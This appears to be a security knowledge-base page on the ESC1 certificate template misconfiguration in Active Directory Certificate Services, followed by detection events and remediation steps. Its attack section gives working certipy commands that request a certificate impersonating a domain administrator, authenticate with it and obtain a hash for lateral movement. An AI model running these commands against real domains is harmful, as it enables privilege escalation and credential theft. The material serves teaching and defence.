Skip to content
Knowledge Graph

ESC1 Certificate Template Vulnerability Abuse

Attackers exploit misconfigured certificate templates that grant excessive permissions. These templates allow low privilege users to request certificates which impersonate high-privileged accounts, such as domain administrators. This leads to privilege escalation as we can request certificates allowing us to authenticate with higher privilege accounts.

Configuration

To be vulnerable to ESC1, the template must have the following config:

  • Client Authentication: True
  • Enabled: True
  • Enrolee Supplies Subject: True
  • Requires Management Approval: False
  • Authorized Signatures Required: 0
  • EKU's:
    • Client Authentication (OID 1.3.6.1.5.5.7.3.2)
    • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • Smart Card Logon (OID 1.3.6.1.4.1.311.20.2.2)
    • Any Purpose (OID 2.5.29.37.0)
    • No EKU (SubCA)

Access

This can lead to an attacker leveraging the template to get a kerberos ticket and the hash for an account for the duration of the certificate validity regardless of password changes.

Performing the attack

Simple:

  • Use certipy to get information on the certificate template
    • certipy-ad find -u 'domainuser@ludus.domain' -p 'password' -dc-ip 10.2.10.11 -text -enabled -hide-admins
  • perform a request via certipy to have the CA issue us a certificate to authenticate as the user we provide in the 'subjectAltName'
    • e.g. EnterpriseAdmin
    • certipy-ad req -u 'domainuser@ludus.domain' -p 'password' -dc-ip '10.2.10.11' -ca 'ludus-ca' -template 'ESC1' -upn 'domainadmin@ludus.domain' -out admin.pfx
  • Use certipy to authenticate as the Higher privileged account.
    • certipy-ad auth -pfx admin.pfx -dc-ip '10.2.10.11'
  • We then have hash with which we can auth using psexec or secretsdump or similar.

Detection

  • Audit Certification Services
    • Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Audit Policies > Object Access > Audit Certification Services
    • Both Success, and Failure
  • For the Certificate Authority Server enable Auditing events for:
    • Back up and Restore of the CA database
    • Change CA Configuration
    • Change CA security settings
    • Issue and manage certificate requests
    • Revoke certificates and publish CRLs
    • Store and retrieve archived keys
    • Start and Stop Active Directory Certificate Services
  • Event 4886 Logged on receipt of Certificate request
  • Event 4887 Indicates AD CS has approved the request and issued certificate.
  • Check for Requestor not matching SubjectAltName
  • Check if SubjectAltName is privileged.

Remediation

  • Revoke Certificate
  • Delete the Account
  • Re-provision for the User

Mapping

MITRE/T1649

References

  • https://www.beyondtrust.com/blog/entry/esc1-attacks